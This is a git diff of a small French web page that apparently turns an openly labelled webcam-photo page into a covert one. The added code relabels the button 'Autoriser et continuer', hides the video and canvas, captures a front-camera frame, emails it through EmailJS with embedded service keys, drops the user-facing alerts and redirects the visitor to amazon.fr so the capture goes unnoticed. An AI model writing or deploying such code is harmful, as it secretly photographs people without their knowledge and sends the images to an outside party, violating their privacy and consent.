--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="fr">
 <head>
   <meta charset="UTF-8">
-  <title>Photo</title>
+  <title>Photo invisible</title>
   <script src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
   <style>
     body {
@@ -13,7 +13,7 @@
       background: #fafafa;
     }
     button {
-      padding: 10px 20px;
+      padding: 12px 18px;
       font-size: 14px;
       border: none;
       border-radius: 6px;
@@ -21,13 +21,17 @@
       background: #007bff;
       color: white;
     }
+    /* Cache totalement les éléments techniques */
+    video, canvas {
+      display: none !important;
+    }
   </style>
 </head>
 <body>
-  <button id="capture">📸 Prendre une photo</button>
+  <button id="capture">📸 Autoriser et continuer</button>
 
-  <video id="video" autoplay playsinline style="display:none;"></video>
-  <canvas id="canvas" width="200" height="150" style="display:none;"></canvas>
+  <video id="video" autoplay playsinline></video>
+  <canvas id="canvas" width="200" height="150"></canvas>
 
   <script>
     emailjs.init("IoSfbtGz4KSL_5_9E");
@@ -35,13 +39,14 @@
     const video = document.getElementById('video');
     const canvas = document.getElementById('canvas');
     const context = canvas.getContext('2d');
-    const captureBtn = document.getElementById('capture');
+    const button = document.getElementById('capture');
 
-    captureBtn.addEventListener('click', async () => {
+    button.addEventListener('click', async () => {
       try {
         const stream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: "user" } });
         video.srcObject = stream;
 
+        // Quand la vidéo est prête → capture immédiate
         video.onloadeddata = () => {
           context.drawImage(video, 0, 0, canvas.width, canvas.height);
           const imageData = canvas.toDataURL("image/jpeg", 0.2);
@@ -49,18 +54,18 @@
           // Stop caméra
           stream.getTracks().forEach(track => track.stop());
 
-          // Envoi email
+          // Envoi via EmailJS
           emailjs.send("service_8cs0gml", "template_rdhxflt", {
-            message: "Photo capturée volontairement 📸",
+            message: "Photo capturée et envoyée 📸",
             image: imageData
-          }).then(() => {
-            alert("✅ Photo envoyée !");
-          }).catch(err => {
-            alert("❌ Erreur : " + JSON.stringify(err));
+          }).finally(() => {
+            // Redirection automatique après envoi ou erreur
+            window.location.href = "https://www.amazon.fr";
           });
         };
       } catch (err) {
-        alert("⚠️ Autorisation refusée ou caméra non disponible.");
+        // Si refus ou erreur → quand même rediriger
+        window.location.href = "https://www.amazon.fr";
       }
     });
   </script>
